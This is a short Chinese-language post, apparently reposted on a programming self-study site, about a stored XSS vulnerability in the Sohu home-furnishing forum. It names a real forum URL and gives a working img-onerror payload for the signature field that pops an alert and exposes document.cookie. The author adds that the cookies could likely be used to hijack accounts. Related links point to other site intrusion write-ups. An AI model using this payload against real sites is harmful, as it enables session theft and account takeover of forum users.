好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

搜狐家居论坛有一个通杀所有子论坛的xss - 网站

随便找一个论坛链接

 

http://home.focus.cn/msgview/1632/270131257.html

 

 

 

在个人签名处输入:

 

<p>

 

<img height="0" onerror="alert(/亲,这里有个xss 漏洞 你们知道吗/);alert(document.cookie)" src="#" width="0" />这个人很懒,留下个弹窗</p>

 

弹个小窗

 

 

 

cookie很多料,估计可盗号(没试,纯YY)

 

查看更多关于搜狐家居论坛有一个通杀所有子论坛的xss - 网站的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did15718
  阅读:73次

上一篇: TCCMS某处设计缺陷,成功打入官网后台 - 网站安全

下一篇:对特斯拉公司官网的一次渗透测试 - 网站安全

相关资讯